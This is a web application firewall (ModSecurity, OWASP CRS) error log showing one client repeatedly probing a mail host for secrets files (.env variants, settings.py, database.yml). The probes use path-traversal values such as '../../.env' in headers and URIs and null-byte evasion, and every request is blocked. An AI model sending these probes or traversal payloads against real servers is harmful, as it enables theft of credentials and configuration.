[Tue May 12 05:30:29.930228 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe1QgpmE1yW0glLdguiAAAAM4"]
[Tue May 12 05:30:29.963214 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1c1tk6y7yBJLpJo5_wAAAIY"]
[Tue May 12 05:30:30.008363 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.staging"] [unique_id "agKe1s1tk6y7yBJLpJo6AwAAAIY"]
[Tue May 12 05:30:30.008574 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.staging"] [unique_id "agKe1s1tk6y7yBJLpJo6AwAAAIY"]
[Tue May 12 05:30:30.161539 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1dr1yOh9Tvizezif3AAAAEY"]
[Tue May 12 05:30:30.197602 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1tr1yOh9Tvizezif3wAAAEY"]
[Tue May 12 05:30:30.197660 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1tr1yOh9Tvizezif3wAAAEY"]
[Tue May 12 05:30:30.197688 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1tr1yOh9Tvizezif3wAAAEY"]
[Tue May 12 05:30:30.197901 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1tr1yOh9Tvizezif3wAAAEY"]
[Tue May 12 05:30:30.197954 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1tr1yOh9Tvizezif3wAAAEY"]
[Tue May 12 05:30:30.197990 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1tr1yOh9Tvizezif3wAAAEY"]
[Tue May 12 05:30:30.198396 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1tr1yOh9Tvizezif3wAAAEY"]
[Tue May 12 05:30:30.762015 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1QgpmE1yW0glLdguiAAAAM4"]
[Tue May 12 05:30:30.806378 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe1ggpmE1yW0glLdgujAAAAM4"]
[Tue May 12 05:30:30.806606 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKe1ggpmE1yW0glLdgujAAAAM4"]
[Tue May 12 05:30:30.820150 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1s1tk6y7yBJLpJo6AwAAAIY"]
[Tue May 12 05:30:30.860913 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.backup"] [unique_id "agKe1s1tk6y7yBJLpJo6CQAAAIY"]
[Tue May 12 05:30:30.861119 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.backup"] [unique_id "agKe1s1tk6y7yBJLpJo6CQAAAIY"]
[Tue May 12 05:30:31.015493 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1tr1yOh9Tvizezif3wAAAEY"]
[Tue May 12 05:30:31.052010 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif4wAAAEY"]
[Tue May 12 05:30:31.052061 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif4wAAAEY"]
[Tue May 12 05:30:31.052089 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif4wAAAEY"]
[Tue May 12 05:30:31.052300 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif4wAAAEY"]
[Tue May 12 05:30:31.052349 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif4wAAAEY"]
[Tue May 12 05:30:31.052380 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif4wAAAEY"]
[Tue May 12 05:30:31.052793 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif4wAAAEY"]
[Tue May 12 05:30:31.599975 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1ggpmE1yW0glLdgujAAAAM4"]
[Tue May 12 05:30:31.644214 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe1wgpmE1yW0glLdgukQAAAM4"]
[Tue May 12 05:30:31.644297 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe1wgpmE1yW0glLdgukQAAAM4"]
[Tue May 12 05:30:31.644461 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe1wgpmE1yW0glLdgukQAAAM4"]
[Tue May 12 05:30:31.651219 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1s1tk6y7yBJLpJo6CQAAAIY"]
[Tue May 12 05:30:31.692362 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.dev"] [unique_id "agKe181tk6y7yBJLpJo6DgAAAIY"]
[Tue May 12 05:30:31.692575 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.dev"] [unique_id "agKe181tk6y7yBJLpJo6DgAAAIY"]
[Tue May 12 05:30:31.888931 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe19r1yOh9Tvizezif4wAAAEY"]
[Tue May 12 05:30:31.925627 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif5gAAAEY"]
[Tue May 12 05:30:31.925667 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif5gAAAEY"]
[Tue May 12 05:30:31.925695 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif5gAAAEY"]
